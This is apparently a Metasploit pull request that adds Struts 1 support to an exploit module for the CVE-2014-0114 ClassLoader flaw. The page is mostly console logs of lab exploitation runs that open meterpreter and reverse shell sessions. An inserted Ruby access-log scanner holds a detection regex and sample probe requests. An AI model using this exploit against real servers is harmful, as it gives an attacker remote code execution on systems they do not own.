
Add Struts 1 support for Apache Struts ClassLoader manipulation vulnerability #4683

Merged
merged 3 commits into from Jan 31, 2015

Conversation

julianvilas
Contributor

Added support for Struts 1 as described at CVE-2014-0114.

In this case only actions using ActionForms are affected, as detailed at http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VMtgmGRwtgg

Testing env:

  • Ubuntu Server 14.04.1 64 bits (3.13.0-32-generic Nexpose #57-Ubuntu SMP)
  • Tomcat 8.0.18
  • Java version "1.7.0_76" & Java version "1.8.0_31"
  • Git rev: 7789d5d
  • Struts version: 1.3.10
  • Struts 1 application with ActionForms

Test:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting               Required  Description
   ----            ---------------               --------  -----------
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.194                yes       The target address
   RPORT           8080                          yes       The target port
   STRUTS_VERSION  1.x                           yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /struts1-helloworld/Login.do  yes       The path to a struts application action
   VHOST                                         no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         172.16.218.194   no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/jtaRE469.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[*] 172.16.218.194:8080 - Countdown 6...
[*] 172.16.218.194:8080 - Countdown 5...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/jtaRE469.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 172.16.218.194
[*] Meterpreter session 1 opened (172.16.218.1:57404 -> 172.16.218.194:4444) at 2015-01-31 00:38:55 +0100
[+] Deleted jtaRE469.jsp
[+] Deleted lRE4

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > 
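
An access-log check for the request shape this CVE-2014-0114 probe relies on, added here as an illustration and not part of the PR or of the Metasploit module: it flags query parameter names that Struts 1 ActionForm population would resolve through java.lang.Class to the ClassLoader. The regex, the `scan_access_log` helper and the sample log lines are my own constructions; the placeholder host and paths are not from the PR.

```ruby
require 'cgi'

# Parameter names that BeanUtils-style nested property population would
# resolve through java.lang.Class -> ClassLoader (the CVE-2014-0114 shape).
# This pattern is my own approximation for illustration, not a vendor filter.
CLASSLOADER_PARAM = /(^|\.|\[['"]?)[cC]lass(\.|\[|['"]?\])/

def classloader_param?(name)
  !!(name =~ CLASSLOADER_PARAM)
end

# Pull the request target out of a combined-format access log line.
REQUEST_RE = %r{"(?:GET|POST|PUT)\s+(\S+)\s+HTTP/[\d.]+"}

# Return the offending parameter names found in one log line ([] if none).
# Only the query string is visible in access logs, not POST bodies, so this
# catches the GET form of the probe only.
def suspicious_params(log_line)
  m = REQUEST_RE.match(log_line)
  return [] unless m
  _path, query = m[1].split('?', 2)
  return [] if query.nil? || query.empty?
  CGI.parse(query).keys.select { |k| classloader_param?(k) }
end

# Walk a log; return [[line_number, [param, ...]], ...] for flagged lines.
def scan_access_log(lines)
  lines.each_with_index.map do |line, i|
    hits = suspicious_params(line)
    [i + 1, hits] unless hits.empty?
  end.compact
end

# Constructed sample lines (not from the PR); host and paths are placeholders.
SAMPLE_LOG = [
  '10.0.0.5 - - [31/Jan/2015:00:38:40 +0100] "GET /struts1-helloworld/Login.do?userName=alice&password=x HTTP/1.1" 200 512',
  '10.0.0.9 - - [31/Jan/2015:00:38:41 +0100] "GET /struts1-helloworld/Login.do?class.classLoader.someProperty=x HTTP/1.1" 200 512',
  '10.0.0.9 - - [31/Jan/2015:00:38:42 +0100] "GET /struts1-helloworld/Login.do?Class%5B%27classLoader%27%5D.other=y&userName=bob HTTP/1.1" 200 512',
  '10.0.0.7 - - [31/Jan/2015:00:38:43 +0100] "GET /struts1-helloworld/Login.do?classification=a HTTP/1.1" 200 512',
]

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each do |ln, hits|
    puts "line #{ln}: ClassLoader manipulation attempt via #{hits.join(', ')}"
  end
end
```

Since the PR notes only actions backed by ActionForms are affected, hits against other endpoints are still worth reviewing but are not by themselves proof of a working probe.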

@jvazquez-r7
Contributor

ooo cool, thanks @julianvilas ! Handling it, I need to deploy a Struts 1 app :P gimme a while, will deploy an environment, test and land if sessions =)

@jvazquez-r7 jvazquez-r7 self-assigned this Jan 31, 2015
@jvazquez-r7
Contributor

It went smoothly =) :

msf exploit(struts_code_exec_classloader) > set TARGETURI /Example2/Login.do
TARGETURI => /Example2/Login.do
msf exploit(struts_code_exec_classloader) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:8080 - Modifying Class Loader...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/SmGw8874.jsp
[*] 172.16.158.131:8080 - Generating JSP...
[*] 172.16.158.131:8080 - Dumping JSP into the logfile...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[*] 172.16.158.131:8080 - Countdown 7...
[*] Sending stage (36 bytes) to 172.16.158.131
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/SmGw8874.jsp
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.131:37374) at 2015-01-30 18:44:47 -0600
[+] Deleted SmGw8874.jsp
[+] Deleted BHGhX

343017005
kGhNoXGFWVAJABSTuTWbqhdRZCoFrdZh
BugcOXKlWBuLzrpbyEgdiSpRuwQEcDFu
GwELgRCLlhEfnGCgFWiiUZszmaVTMJAr
id
uid=1000(juan) gid=1000(juan) groups=1000(juan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)

Thanks @julianvilas , landing!

@jvazquez-r7
Contributor

btw, in case someone else needs to test by himself, I've used an example app available here: http://www.dzone.com/tutorials/java/struts/struts-example/struts-login-page-example-1.html , pointed by @julianvilas , thanks!

@jvazquez-r7 jvazquez-r7 merged commit f983c81 into rapid7:master Jan 31, 2015
jvazquez-r7 added a commit that referenced this pull request Jan 31, 2015
@julianvilas julianvilas deleted the redsadic-rooted2k15 branch January 31, 2015 00:50